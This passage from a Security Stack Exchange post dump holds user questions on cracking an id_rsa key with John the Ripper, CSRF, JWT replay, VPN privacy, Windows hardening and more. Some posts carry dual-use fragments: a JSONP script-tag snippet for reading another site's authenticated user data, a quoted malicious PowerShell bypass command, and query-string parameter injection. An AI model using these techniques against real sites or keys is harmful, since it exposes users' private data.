+Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
+Cost 2 (iteration count) is 16 for all loaded hashes
+Will run 4 OpenMP threads
+Note: This format may emit false positives, so it will keep trying even after
+finding a possible candidate.
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:02:34 DONE (2020-01-13 12:15) 0g/s 23.00p/s 23.00c/s 23.00C/s paagal..sss
+Session completed
+
+**# john --show id_rsa.hashes 
+0 password hashes cracked, 1 left**
+
+
+ +

I guess the problem is in the --format option used. But I don't see a more suitable one.

+",160617,,35683,,1/25/2021 0:58,1/25/2021 0:58,How do I crack an id_rsa encrypted private key with john the ripper?,,4,0,1,,,CC BY-SA 4.0 +224113,1,,,1/13/2020 11:57,,1,117,"

How can I find out the mode block cipher used in a PEM certificate I have? +It's been generated with an intermediate CA that does sha256WithRSAEncryption but I need to find out if it's a GCM or CBC to properly configure some devices.

+",219288,,98538,,1/13/2020 12:12,1/13/2020 14:44,What's the block cipher mode of my PEM certificate?,,1,0,,,,CC BY-SA 4.0 +224115,1,,,1/13/2020 12:47,,0,113,"

+ +

+ +

I was doing my plesk hosting logs checking for web and database development. Somehow, I had seen some weird ip trying to communicate to hosting. Wonder what is the purpose of these anonymous requests. Should I just ignore them as they are common issue happening around?

+ +

Thanks in advance. P/S: This website still in development stage, should be no one knowing this website address.

+",224946,,,,,1/13/2020 13:01,Why there are some weird requests to my web hosting,,1,3,,1/13/2020 14:47,,CC BY-SA 4.0 +224118,1,224125,,1/13/2020 13:35,,1,445,"

Per mine understanding, by default same origin policy(SOP) is enabled by default by all browsers. This means that a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin.

+ +

My question is do we need to handle CSRF attack separately with the CSRF token as SOP is in place. I see almost all websites mitigates it by CSRF token implementation buy why it is required when SOP is in place ?

+ +

I see another related cookie “SameSite=strict” at this blog to prevent CSRF . To me it looks like SOP which is provided by browser +by default. So is it really required ?

+",46027,,,,,1/13/2020 15:10,Same origin policy for CSRF attack?,,1,0,,,,CC BY-SA 4.0 +224119,1,224121,,1/13/2020 13:44,,0,111,"

Company A owns a building and leases out 2 offices to other companies.

+ +

Telecom 1 provides internet to Router 1 with ip address x.x.x.121

+ +

Company A connects their router, Router A, to it and gives it IP address x.x.x.122
+Company B connects their router, Router B, to it and gives it IP address x.x.x.123
+Company C connects their router, Router C, to it and gives it IP address x.x.x.124

+ +

Is that effectively the same as each company having a seperate line?

+ +

Assume that A has control of the main router and each has access to their own router but no one else's.

+ +

EDIT: +In my case the main router is a Cisco 2811
+Company A is using a Ubiquiti EdgeMax
+Company B unsure
+Company C a BT home hub

+",191479,,191479,,1/13/2020 13:50,1/13/2020 14:00,Is each office having their own router coming off the main router as secure as each office having their own internet line,,1,1,1,,,CC BY-SA 4.0 +224120,1,,,1/13/2020 13:53,,1,216,"

From the official description:

+ +
+

HTTP Catcher is a web debugging proxy. It can be used to intercept, inspect, modify and replay web traffic.

+
+ +

Can someone explain to me how HTTP Catcher manages to do this? I have seen logs (sent to me by a colleague) where it seems that HTTP Catcher can show SSL traffic in clear for traffic from a separate application (which we are developing).

+ +

Shouldn't this be impossible for a separate application? Did we misconfigure something?

+ +

Note, it seems no certificate was added for HTTP Catcher in to the local store (that would explain how it is able to MITM without the app complaining about it).

+ +

(Regretfully I cannot share the screenshots, as they contain sensitive information.)

+",16145,,16145,,1/16/2020 7:07,1/16/2020 7:07,How does HTTP Catcher (iOS app) work on SSL/TLS?,,0,3,,1/13/2020 14:56,,CC BY-SA 4.0 +224126,1,,,1/13/2020 15:19,,0,74,"

I need to figure out how to run my application on Windows 10.

+ +
    +
  1. My application would run on an app-specific account (let's called it ""App"").

  2. +
  3. My application saves/reads PDFs from the folder ""PDF"". I need to make sure that ONLY the application and admin users may enter this folder. So I would add rights - so only admins and App can work with this folder.

  4. +
  5. Public key for encrypting these PDF is in the applications folder called ""resources"". I would add the same rights as I wrote in point 2. I need to make sure that no one else can copy that public key (only app and admin).

  6. +
+ +

Is this approach correct?

+",224958,,6253,,1/13/2020 15:31,1/13/2020 15:31,Securing application on windows 10,,0,2,,,,CC BY-SA 4.0 +224129,1,,,1/13/2020 16:02,,1,202,"

I am testing a Web Application and i have found a endpoint which is returning some data in json the endpoint is this.

+ +
/api/vtexid/pub/authenticated/user
+
+ +

Now i was testing to find out that if this endpoint supports JSONP by appending a query parameter of ?callback=obj

+ +
   /api/vtexid/pub/authenticated/user?callback=obj
+
+ +

When i open this url a file was downloaded and it looked something like this.

+ +
obj({
+  ""userId"": ""123"",
+  ""user"": ""abc@gmail.com"",
+  ""userType"": ""F""
+})
+
+ +

Now when i tried to load the endpoint in a <script> tag to extract the data.

+ +
<html>
+
+<script>
+function obj(d) {console.log(d)}
+</script>
+
+<script src=""https://www.example.com/api/vtexid/pub/authenticated/user?callback=obj"" type=""application/jsonp""></script>
+
+</html>
+
+ +

I ended up getting an error in the console that

+ +
+

Refused to execute script from + 'https://www.example.com/api/vtexid/pub/authenticated/user?callback=obj' + because its MIME type ('application/jsonp') is not executable, and + strict MIME type checking is enabled.

+
+ +

And looking into the Request Headers the Content-Type is set to application/jsonp

+ +

So is there any workaround for this to get the data.

+",224961,,,,,1/13/2020 16:02,How to handle application/jsonp response,,0,3,,,,CC BY-SA 4.0 +224131,1,224133,,1/13/2020 16:54,,0,233,"

I am scanning Linux server which has two kernels versions stored, when I run following command I can see for example this version:

+ +
user@host [~]# rpm -q kernel
+kernel-3.10.0-327.el7.x86_64
+kernel-3.10.0-1062.4.1.el7.x86_64
+
+ +

When I run this command, which identifies the current kernel version that is being utilized on the server this is new version.

+ +
user@host [~]# uname –sr
+Linux 3.10.0-1062.4.1.el7.x86_64
+
+ +

My security scanner reported that I have many vulnerabilities because of using kernel-3.10.0-327.el7.

+ +

Questions:

+ +
    +
  1. Does this mean that this is false positive because I am not using this version on the server?
  2. +
  3. Where can I check if kernel-3.10.0-1062.4.1.el7.x86_64 is the latest kernel version?
  4. +
+",156661,,61443,,1/13/2020 17:12,1/13/2020 17:13,Vulnerable stored Linux kernel version,,1,1,,,,CC BY-SA 4.0 +224135,1,,,1/13/2020 17:40,,0,323,"

I have just configured my Windows 10 desktop PC at home to automatically log into my Windows 10 user account that my Microsoft account is linked to on startup. My desktop is in my bedroom upstairs and I trust my parents who I live with to not snoop around. However, I was wondering if this could have any security concerns beyond ""your account is essentially passwordless when starting your PC"". For example, could someone abuse this usability change to steal my Microsoft password after logging in? Could someone do so through a malicious website? Could someone do so through a backdoor in an app?

+ +

In other words: which security risks does enabling automatic authentication on startup on a Windows 10 machine using a Microsoft account bring beyond guaranteeing an attacker with physical access to a non-booted machine can access my machine?

+",34161,,,,,2/1/2022 23:01,security concerns when configuring Windows 10 to automatically log into a Microsoft account-linked user account,,1,0,,,,CC BY-SA 4.0 +224144,1,,,1/13/2020 22:10,,0,200,"
+

If I know the hash of a program you intend to install is d306c9f6c5..., if I generate some other file that hashes to that value, I could wreak all sorts of havoc. - from https://nakamoto.com/hash-functions/

+
+ +

Theoretically, If you know the hash of a program one intends to install and you generate another file that hashes to that value what could you do?

+",166507,,,,,1/18/2020 15:32,"Theoretically, If you know the hash of a program one intends to install and you generate another file that hashes to that value what could you do?",,2,3,,1/24/2020 14:27,,CC BY-SA 4.0 +224146,1,,,1/13/2020 22:19,,0,253,"

The standard file with packaging instructions (setup.py with setuptools) for Python contains an author_email field. Such a package can then be published to PyPI, but the code is also available publicly on github.

+ +

Am I unnecessarily cautious if I want to obfuscate the email address in the setup.py file (e.g. by calling a base64.decodebytes())?

+ +

It seems superfluous to have the address as ""john.doe[at]gmail.com"" (with brackets) in a README file, but as plain text legit email in a python file, but I have seen no one obfuscating their setup.py address.

+ +

Nowadays, spam filters perform well, but is there some interest in doing what I suggest? Or does it just make my code look like virus?

+",113920,,,,,1/13/2020 22:19,Packaging Python code for github: should I obfuscate author email address from the `setup.py`?,,0,5,,,,CC BY-SA 4.0 +224147,1,,,1/13/2020 22:42,,1,999,"

can you please explain the strength of veracrypt and keepass compared?

+ +
    +
  1. Whats theoretically easier to break if both use the exact same password for their respective containers, the vcrypt or keepass file?

  2. +
  3. Are they both still considered in the dev community as ""unbroken"" and safe encryption tools for storing data? Or are there successful attacks publicly known? Do they currently have any known weaknesses in their code bases?

  4. +
  5. Lets say you have a Text.txt file. In one case this txt file is stored in the vcrypt container. And a second time in the keepass kdb as an attachement. Now, when you open both on your windows system (mounting vcrypt and opening keepass kdb), which one is in this ""opened state"" more vulnerable to what kind of attacks? Which one isolates .txt file in a better way? Here you can consider that you are connected to the Internet while those files are open and you can consider any other attacks.

  6. +
  7. In case of veracrypt: Is the file safety somehow decreased, when we start opening the text .txt file from within the vcrypt container? How does that impact potential unwanted file access?

  8. +
  9. what difference does it make in vcrypt selecting algorithms in different order? eg serpent-aes or aes-serpent. What impact does the order have on bruteforcing attacks?

  10. +
+",213061,,6253,,1/13/2020 22:53,2/13/2020 0:01,Encryption strength veracrypt vs keepass?,,1,0,,,,CC BY-SA 4.0 +224148,1,224151,,1/13/2020 22:50,,1,389,"

I have run into this scenario a couple of times now but am hoping to get either confirmation that I'm on the right track or a suggestion as to what else should be done.

+ +

Situation

+ +

I am building a back-end web service that provides access to sensitive data or privileged operations. This web service will not be publicly accessible but will be called by a front-end application that is. There may ultimately be multiple applications that need to access the service but not necessarily with different levels of access.

+ +

We want to secure the web service so that any other devices on the network are able to make calls the service, nor sniff traffic to determine how to authenticate.

+ +

Solution

+ +

Using a large, securely-generated random API key, which is sent via Basic authentication, the username and password are separated, the password hashed with SHA-256, and the result compared against a stored value for the user. This is done over TLS (i.e. with a pinned self-signed certificate or even with a valid CA-signed certificate) to prevent sniffing and to ensure that the client validates the server's authenticity.

+ +

Since the password is a large (let's say 128-bit) random value, the purpose of hashing the value is mostly:

+ +
    +
  1. To avoid storing the api key in the web service
  2. +
  3. To prevent timing attacks from string comparison against the actual API key, if it was actually stored by the application
  4. +
+ +

Additional Thoughts

+ +

I considered doing a more typical password-hashing method (e.g. Argon2) but since the password is not intended to be human readable, it doesn't seem like much would be gained. Even salting the value doesn't seem like it would be very valuable since the space of possible API keys is so large.

+ +

There is also a definite need to keep this fast, since it will be sent with every request, so doing too much processing is not desirable.

+ +

Also, since this method is very straightforward, I'm not really looking for an alternate method is if this is secure enough. I'm really either looking for improvements that can be made to this schema or reasons that it's absolutely not secure (in which case I'm willing to hear about alternatives).

+",51963,,51963,,1/13/2020 23:23,1/13/2020 23:23,Validating API keys in a back-end web-service with very few users,,1,6,,,,CC BY-SA 4.0 +224158,1,,,1/14/2020 4:25,,0,395,"

Years ago I had a bunch of bitcoin in a wallet that I encrypted. This was back when bitcoin was like $0.20 or $0.30 each. At one point I couple hundred of them but didn't know what to do with them. I lost the wallet & never really looked for it until the price skyrocketed especially digging for it when the price was at $20k but I never located it.

+ +

However, recently I got some old hard drives that had been stored at my parents for years and when looking through some of the drives I found a file btc.tar.gz.enc.

+ +

I don't remember creating this file but again it was so long ago and the coins were nearly worthless so I probably wouldn't. I have no idea how to open or decrypt the file...

+ +

I ran strings on it & I get this:

+ +
+

zoidberg@PlanetExpress:/mnt/c/Users/Keith/Documents$ strings btc.tar.gz.enc + Salted__ + s}mS'. + )hXe + eFeI + ?b`Z + OA&$> + %n&LBX + ?m)h;0+- + t$+D' + mIAi + h,|V + Fg.d

+
+ +

I don't know if this is a wallet with a decent amount of coins in it but even if it has a couple it would be awesome to get in there.

+ +

Does anyone have any suggestions for how I may be able to figure out how to decrypt it? If I can figure that out I think I can eventually guess the password I used on it.

+ +

I'm assuming I used openssl but I don't know what cipher I used or anything.

+ +

If I'm able to open this and it has anything decent in there I will buy a very nice bottle of Whiskey for the gentleman/gentlewoman/insert pronoun here that provided the information. (I know people would help me just because people on here are great... But I would still do so if they wanted it).

+ +

Thank you in advance!

+",224995,,,,,1/14/2020 9:36,How to determine what cipher I encrypted a file with?,,0,3,,,,CC BY-SA 4.0 +224161,1,,,1/14/2020 6:05,,0,79,"

I am wondering, if it should be possible to transfer PIN in case of migrating between different payment schemes like Mastercard or VISA.

+ +

For example, when I have a card issued by Mastercard, and it will be changed to VISA, is it possible to keep the same PIN after issuing new card from VISA?

+ +

From my perspective, and what I was able to find, it should be possible, as the algorithm is based on PIN keys and offset in case of changing the PIN by user. If the algorihms are same in case of Mastercard and VISA, there should not be any issue.

+ +

Are there any specifics which should be considered to make PIN transfer happen?

+",34132,,,,,1/14/2020 6:09,PIN transfer between payment schemes,,1,0,,,,CC BY-SA 4.0 +224163,1,,,1/14/2020 6:21,,1,1043,"

This question was originally Does Firefox in VM have a common enough fingerprint so I don't need tor browser? in Tor community.

+ +
+

I want to know about what a web browser's fingerprint like in a VM, if + VM runs a common OS and have default system settings. Can VM be + configured to not have any of host machine's fingerprint?

+ +

(Here I just want to ask about fingerprint, ignoring IP addresses, web + scripts and tracking cookies)

+
+ +

Here the VM software we discuss would better be FOSS, like Virtualbox or qemu.

+ +

That question could be on not just web browser, but also other kind of softwares.

+",190967,,,,,6/13/2020 8:15,How to configure a VM to protect all my hardware fingerprint from guest OS and softwares?,,2,0,,,,CC BY-SA 4.0 +224172,1,224174,,1/14/2020 9:34,,45,10805,"

If I send an email with an .exe attachment to an Outlook recipient, the email client blocks the attachment and the recipient has no way of overriding this security setting (short of making certain changes to the registry). If I send the same email to a Gmail recipient, the email is refused by the server.

+ +

Why are they being so strict? Is there a possibility that the attachment may execute automatically, or is it simply to protect naive users from explicitly executing an untrusted attachment? Would it not be sufficient to use a big, fat warning aka ""Are you really sure you want to do this?""

+ +

Of course, I can upload my .exe file to a file sharing service and provide the link in the email. Why is this considered any more safe than an attachment? A malicious scammer may do the same thing.

+ +

EDIT: I ask this question partially to learn whether it is safe to turn the feature off (by modifying HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level1Remove). I take it from the answers that this is safe for me personally, but probably not on the administrator level.

+",,user225011,,user225011,1/15/2020 6:14,1/17/2020 17:59,Why do email server/clients block executable attachments?,,7,7,6,,,CC BY-SA 4.0 +224173,1,,,1/14/2020 9:47,,0,50,"

While I came to this site from researching whether inactive (or flattened) PDF documents could contain viruses and have come across this link in this + site, it does not answer my question.

+ +

I need to devise a strategy to flatten PDF documents to prevent active fields to inflict any harm. So, could a flattened PDF document still contain viruses and would these viruses become active when the document is opened?

+",225012,,,,,1/14/2020 9:47,Can flattened pdf documents contain viruses?,,0,3,,1/14/2020 9:51,,CC BY-SA 4.0 +224176,1,224185,,1/14/2020 10:48,,0,1059,"

I want to be active on Twitter against our oppressive government. Can my government trace and detect me?

+ +

Twitter is banned here and we must use VPNs. I use Outline (Shadowsocks) mostly. Is there any way to trace users via information from the ISPs or something? If using Outline is not a good option, is using TOR a good solution?

+ +

The importance of this question is that I can be sentenced to death for just a Twitter post! I don't want to be traced. I remove metadata of Images I post and do some basic methods but I want to be sure there is not any problem with my activity on Twitter. What I have to do?

+",225018,,225018,,1/15/2020 14:56,1/15/2020 15:13,Can my oppressive government trace my Twitter activity and detect me?,,2,4,,,,CC BY-SA 4.0 +224178,1,224182,,1/14/2020 11:09,,-1,461,"

I set up my own VPN by installing OpenVPN on a Ubuntu server, then I download client.ovpn file from Ubuntu server to my Windows laptop. And then, I import that client.ovpn to OpenVPN GUI app on Windows and finally, I connect to my Ubuntu VPN server and everything work fine.

+ +

I installed OpenVPN on Ubuntu server using this instruction: https://github.com/angristan/openvpn-install

+ +

So I think traffic flow will be like this:

+ +
My computer (browser,...) --> Ubuntu OpenVPN server --> Internet.
+
+ +

Does OpenVPN GUI encrypt traffic between my computer to Ubuntu OpenVPN server?

+",225020,,6253,,1/14/2020 11:12,1/14/2020 13:47,Does OpenVPN encrypt my traffic between my computer and VPN server?,,1,8,,,,CC BY-SA 4.0 +224179,1,,,1/14/2020 13:03,,1,331,"

I was involved in a conversation concerning the in-house vulnerability management program. One the statements made was that the management is generally not willing to accept risk and it should be aimed to mitigate it preferably in form of patching.

+ +

On the other hand, there are cases of applications that are vulnerable (most of them have critical and high severity levels) and they are going to be decommissioned by the end of 2020.

+ +

The problem is, that no one wants to put money on the table for fixing the vulnerabilities because the product or products will be decommissioned in a few months’ time.

+ +

I’m now wondering, aren’t they somehow already accepting the risk of not providing funds for fixing the vulnerabilities or is it more an example of neglect?

+ +

Furthermore, shouldn’t, in this case, a formal process of risk management exist to weigh the cost against the potential loss caused by a possible exploitation leveraging the vulnerability?

+",211245,,6253,,1/14/2020 13:42,1/14/2020 13:50,"vulnerability management, risk mitigation vs risk acceptance",,1,0,,,,CC BY-SA 4.0 +224184,1,,,1/14/2020 14:30,,0,164,"

I am working on lambda authorization and I learned that there are generally two options.

+ +

Either use the default authorizer on the API gateway level, which will do all the heavy lifting (validate the tokens), or write a custom authorizer, which will require me to implement all the logic including all the token validations, which I would like to avoid if possible. I don't want to write such code, I want to use something that is time proven and tested.

+ +

My question is, is it considered secure to write code in my lambda (e.g. python decorator) that will do authorization based on the data in the lambda context.authorizer.claims? +assuming of course all I need is there (e.g. cognito:groups, cognito:username, etc.)

+ +

can I treat the authorizer data in the context as solid (passed the security validation)?

+",225030,,6253,,1/14/2020 15:15,1/14/2020 15:15,Is it secure to rely on the data in a lambda context authorizer claims?,,0,2,1,,,CC BY-SA 4.0 +224190,1,,,1/14/2020 16:30,,-2,103,"

While testing a website i noticed a weird behaviour. When resetting the password a POST request with empty body is generated. The request is the following:

+ +

POST /reset/token/[token]/passwhord-hash

+ +

Now my question is: If google or any third party will intercept this request, will it also be able to log the password-hash and reset token?

+",221732,,,,,1/14/2020 17:02,What part of this request can be logged?,,1,8,,1/15/2020 7:34,,CC BY-SA 4.0 +224191,1,224196,,1/14/2020 16:48,,1,338,"

Backstory: been toying with the idea of setting up some raspberry pi cctv cameras. originally I was going to store all footage for 31 days (complying with DPA) on a network drive but decided against that as if there was a major incident at my property the drive might get stolen/damaged.

+ +

So I thought I could upload footage to my google drive and then just have another script run and remove any old footage. I stumbled on pydrive and thought excellent, I'm fairly experienced with python so happy to knock up something.

+ +

The problem is the line:

+ +
+

The downloaded file has all authentication information of your application. Rename the file to “client_secrets.json” and place it in your working directory.

+
+ +

I have very limited knowledge of oauth2 and token use in general, I believe I understand access keys such as ssh or pki.

+ +

As these will be stored locally on raspberry pi zero, I am concerned that if I were to be burgled they may stuff it in their bag and then if savvy enough might comb through it and find access to my google drive account.

+ +
    +
  1. Should I be concerned with this type of token?
  2. +
  3. Where should I store it?
  4. +
  5. How should I secure the Raspberry Pi for this scenario?
  6. +
+",211839,,188129,,1/14/2020 20:02,1/14/2020 20:02,Where to store pydrive secret?,,1,0,,,,CC BY-SA 4.0 +224199,1,,,1/14/2020 19:37,,3,1272,"

OWASP recommends setting session timeouts to minimal value possible, to minimize the time an attacker has to hijack the session:

+
+

Session timeout define action window time for a user thus this window represents, in the same time, the delay in which an attacker can try to steal and use a existing user session...

+

For this, it's best practices to :

+
    +
  • Set session timeout to the minimal value possible depending on the context of the application.
  • +
  • Avoid "infinite" session timeout.
  • +
  • Prefer declarative definition of the session timeout in order to apply global timeout for all application sessions.
  • +
  • Trace session creation/destroy in order to analyse creation trend and try to detect anormal session number creation (application profiling phase in a attack).
  • +
+

(Source)

+
+

The most popular methods of session hijacking attacks are session-fixation, packet sniffing, xss and compromise via malware, but these are all real-time attacks on the current session.

+

Once hijacked, the attacker will be able to prevent an idle timeout (via activity), and I would consider any successful session hijack a security breach anyway (unless you want to argue how much larger than zero seconds of access an attacker can have before it actually counts as an actual breach).

+

If the original method of getting the session token can be repeated, this seems to further limit the usefulness of a timeout -- a 5-minute window that can be repeated indefinitely is effectively not limited.

+

What real-world attack exists (even theoretically) where a session timeout would be an effective mitigation? Is session expiry really just a form of security-theater?

+",27894,,-1,,6/16/2020 9:49,1/14/2020 22:24,What attacks are prevented using Session Timeout or Expiry?,,1,11,,,,CC BY-SA 4.0 +224200,1,224203,,1/14/2020 20:41,,39,13548,"

For input validation on a website, are there any security concerns with disclosing to the user exactly what characters are valid or invalid for a given field?

+

CWE-200: Information Exposure says one should try not to disclose information "that could be useful in an attack but is normally not available to the attacker". A specific example would be preventing a system from exposing stack traces (addressed by CWE-209: Information Exposure Through an Error Message).

+

Should one ensure that error messages are vague, like "The text you entered contains invalid characters"?

+

Is it a security vulnerability to include the regular expressions used to validate input in client-side code, such as JavaScript, that would be visible to attackers? The alternative, validating inputs server-side, would reduce usability somewhat as it would require more backend communication (e.g. it could cause the site to respond and display errors slower).

+

Or is this a form of "security through obscurity" as the user/attacker can deduce what characters are valid by repeatedly submitting different characters to see if they produce errors?

+

Is it worth the hits to user experience to potentially slow down an attack?

+

I should note, as far as I can tell, OWASP's Input Validation Cheat Sheet and Data Validation development guide don't provide direction on this topic.

+

Edit 2020-01-17:

+

There have been several questions (including answers that I went to the effort of writing comments on that have since been deleted) as to why one should be doing any input validation.

+

First off, thank you to @Loek for the comment pointing to OWASP's Application Security Verification Standard that provides guidance on passwords on page 23 and 24: "Verify that there are no password composition rules limiting the type of characters permitted. There should be no requirement for upper or lower case or numbers or special characters.".

+

I think we can all agree that limiting characters in a password is generally a bad idea (see @Merchako's answer). As @emory points out it probably can't be a hard and fast rule (e.g. I have seen many mobile apps that use an easier to use secondary "PIN" to secure the app even someone else has access to log into the device.) I didn't really have passwords in mind when I asked this question but that's one direction the comments and answers went. So for the purposes of this question let's consider it to be for non-password fields.

+

Input validation is part of "defense in depth" for websites, web services, and apps to prevent injection attacks. Injection attacks, as stated by OWASP, "can result in data loss, corruption, or disclosure to unauthorized parties, loss of accountability, or denial of access. Injection can sometimes lead to complete host takeover. The business impact depends on the needs of the application and data."

+

See OWASP's #1 vulnerability, A1-Injection, and CWE-20: Improper Input Validation for more detailed information. Note they both say input validation is not a complete defense but rather one layer of that "defense in depth" for software products.

+",189599,,189599,,4/11/2022 22:09,4/11/2022 22:09,Is it a security vulnerability to tell a user what input characters are valid/invalid?,,7,5,6,,,CC BY-SA 4.0 +224201,1,224206,,1/14/2020 20:56,,2,338,"

Learning a bit about IT security, a segment of the material was the basics of steganography - specifically, hiding information in the lowest significance bits of images, and converting images into sounds. For the first it occurred to me that many sites compress user-uploaded images, effectively destroying any information hidden this way.

+ +

My question is, are there techniques other than changing lowest significance bits that survive image compression, but aren't clearly visible?

+",164278,,,,,9/4/2020 13:48,What steganographic techniques can I use in images that survive lossy compression?,,1,0,1,,,CC BY-SA 4.0 +224214,1,,,1/14/2020 22:24,,2,305,"

All over the news today (2020-01-14) is the story that the NSA and Microsoft have reported a critical security vulnerability in Windows 10.

+ +

But I haven't been able to find clear instructions about how to ensure that Windows Update has worked properly.

+ +

When I click the Start button and then then type ""winver"" and click ""Run command"", I see that I have Windows 10 Version 1803 (OS Build 17134.191)

+ +

Windows > Settings > ""Update & Security"" > ""See what's new in the latest update"", it bounces me to https://support.microsoft.com/en-us/help/4043948/windows-10-whats-new-in-recent-updates, which doesn't seem to mention security at all.

+ +

The Windows Update feature itself seems flaky, confusing, and unreliable.

+ +

I'm the most tech-savvy in my large extended family, and I generally try to help others (especially older generations) keep their systems working well, but right now I'm struggling to find a set of steps I can walk them through to confirm that their systems are no longer vulnerable.

+",34766,,,,,1/14/2020 22:49,How to ensure Windows 10 is safe from critical security hole reported by NSA on 2020-01-14?,,1,0,1,,,CC BY-SA 4.0 +224218,1,,,1/14/2020 23:28,,1,550,"

I often download files either using my browser or by torrenting. Few times, I encountered an attack where the torrented file was called something like movie.mp4.lnk and the target was set to run a powershell script using cmd.exe /c ""powershell.exe -ExecutionPolicy Bypass ..."". Fortunately, I always noticed the extension before running it, but I may not always be so lucky.

+ +

I'd like to configure Windows (I'm using Windows 10 Education) to show a confirmation popup whenever I attempt to run any potentially malicious file (exe, msi, cmd, bat and ps1 for starters) outside a list of defined folders. I'm comfortable with GPO and powershell, would like to avoid solutions using 3rd party programs if possible.

+ +

I already tried to configure AppLocker, but

+ +
    +
  1. it outright blocks the file, which is usually not what I want, as I often download legitimate programs,
  2. +
  3. for some strange reason, it allows .lnk files with scripts as target.
  4. +
+ +


+Ideal scenario:

+ +
    +
  1. I run notepad.exe, located in C:/Windows/System32, which is whitelisted as a system folder, and it runs without any confirmation.

  2. +
  3. I download a file by torrenting, called awesomeMovie.mp4.exe, to a media folder, maybe D:/Movies/Downloaded. After clicking it, a confirmation dialog pops up, and I have to explicitly click Yes before the program runs. If the file was instead called awesomeMovie.mp4, it opens in my media player without any popup.

  4. +
+",224340,,,,,2/6/2022 0:09,Show confirmation popup before running any downloaded program in Windows 10,,1,6,,,,CC BY-SA 4.0 +224219,1,227000,,1/14/2020 23:37,,1,448,"

I already read good answers about preventing replay attacks with JWT and a lot of resources like jwt.io.

+ +

The conclusion was that I needed to use the jti claim. From: Can I prevent a replay attack of my signed JWTs?

+ +

My schema right now is simple:

+ +
    +
  1. User logs in.
  2. +
  3. Server answers with a JWT.
  4. +
  5. Client checks if it's valid and stores it.
  6. +
  7. Client sends the JWT.
  8. +
  9. If it's valid the Server answers with a new JWT.
  10. +
  11. Wait 30 seconds
  12. +
  13. Go back to step 3.
  14. +
+ +

So I started using jti, On step 4 it will use the jti stored on db from step 2 and create a new one for the next request.

+ +

While this works to prevent replay attacks on the server-side, it doesn't for the client-side. The flaw I found is: What if user redirects the traffic and always answers the same jwt, the client will think ""hey this jwt is valid"".

+ +

I had the brillant idea of saying ""well, the jwt can't be the same as the last one"". And found another flaw: now the user only needs 2 jwts to break it.

+ +

And now I have no idea on how to prevent this. I can't save all the jwts on the client side.

+ +

@edit: I forgot to add, this desktop app requires constant internet connection, it's like a game where you login and if someone logs in with your account you get kicked because your session is not valid anymore.

+ +

I'm trying to prevent multiple users on the same account at the same time, and ofc trying to prevent the user from using the same jwt and not needing to login anymore. (it's a paid software)

+",206672,,2147,,3/7/2020 22:36,3/7/2020 22:53,Preventing jwt replay attacks against the client-side,,1,0,,,,CC BY-SA 4.0 +224220,1,,,1/14/2020 23:42,,2,154,"

I have a form that takes multiple input fields and makes an API request via GET.

+ +

The fields are not properly sanitizing input and I am able to add arbitrary parameters to the query string by submitting input such as test&color=red.

+ +

Instead of some sort of encoding, the resulting API query looks like api.com/search?field=search&color=red

+ +

I cannot think of any malicious use to this, as anybody could just hit this endpoint directly or use a proxy to bypass any client side validation.

+ +

If you were performing an application review, is this something that might be worth calling out?

+",182339,,,,,2/8/2021 14:03,Adding to the query string via input,,4,1,,,,CC BY-SA 4.0 +224222,1,,,1/15/2020 1:41,,3,314,"

My (limited) understanding is that my password is used to encrypt the keys which are used to encrypt my mail messages on protonmail's servers. Does that mean that knowledge of my password could potentially let an adversary find out what the keys associated to my account are, and thus render password change useless? Or are keys periodically subject to change as well, and all my emails re-encrypted? Or have I got it completely wrong?

+",225065,,,,,6/13/2020 23:05,"If my protonmail password is compromised, does that potentially mean that my whole account is, permanently?",,1,0,,,,CC BY-SA 4.0 +224224,1,224229,,1/15/2020 3:29,,0,777,"

I used an OpenSSL 1.0.1k 8 Jan 2015 version to generate a 32-bit RSA key, and I tried to generate a CSR for the key

+ + + +
$ openssl req -new -key privatekey.pem -out csr.pem 
+
+139645847348928:error:04075070:rsa routines:RSA_sign:digest too big for rsa key:rsa_sign.c:127:
+139645847348928:error:0D0DC006:asn1 encoding routines:ASN1_item_sign_ctx:EVP lib:a_sign.c:314:
+
+ +

openssl only allows me to generate no smaller than 384-bit. Is there another way for me to generate a CSR for my private key?

+",225070,,,,,1/15/2020 5:45,Generating a CSR for 32 bit private rsa key,,1,3,,,,CC BY-SA 4.0 +224227,1,224236,,1/15/2020 5:04,,3,245,"

Why do we need to ask the authorization server for theAuthorization code and then exchange the Authorization code for anAccess token on the same server? Why not to return anAccess token directly, without issuing anAuthorization code? +I do understand that it is specified by the standard but there should be some logic behind this.

+",129477,,222373,,1/16/2020 7:05,1/16/2020 7:05,What is the purpose of the authorization code in OAuth 2?,,1,1,,1/26/2020 15:39,,CC BY-SA 4.0 +224239,1,224242,,1/15/2020 12:33,,0,118,"

Many PHP frameworks such as Codeigniter on production environment opt-out to hide any PHP related error message. Also, that applies on other PHP frameworks as well such as Symphony and Laravel (with the appropriate settings).

+ +

So I wanted to know if this behavior increases slightly my web-app's security and how is security in increased.

+",168285,,,,,1/15/2020 13:11,Does hiding php error messages increase security of the web app?,,1,1,,1/15/2020 13:19,,CC BY-SA 4.0 +224241,1,,,1/15/2020 13:07,,0,207,"

I joined a small project, I noticed that in the project uses something like a token associated with a user journey. So the URL looks something like: https://host.com/sell/:jurneyID.

+ +

All data entered during by the user in the journey are associated with the jurneyID including email, personal information and so on.

+ +

That means when I go to https://host.com/success/:jurneyID I can see user data related to that journey.

+ +

There is no concept of a session which means that anyone who knows jurneyID can access this data.

+ +

In theory jurneyID is long randomly unique string and expires after two weeks, however, I still don't like this solution because:

+ +
    +
  • token string can be brute-forced
  • +
  • jurneyID is part of the URL therefore can be extracted from logs, browser history, etc.
  • +
+ +

I'd like to ask if you know any resources which can prove that this solution is a bad idea, and does such vulnerability has its name?

+",83156,,,,,1/21/2020 23:26,Accessing user data by a public 'token' - is it a potential vunabilility?,,4,4,,,,CC BY-SA 4.0 +224243,1,,,1/15/2020 13:12,,0,238,"

I am developing a website to sell a product that is very likely to be botted. The reason people will bot it is not to spam me or anything, but because they want to buy the product faster than anyone else.

+ +

My current strategy has been to lock my purchase page behind a password page. Then, when I release some stock I will reveal the password via Twitter and people can enter it and buy the product. I will make sure the password is not something the bot can just copy and paste, you'll have to put in minimal effort to work it out - but will be very difficult for a computer to do on its own.

+ +

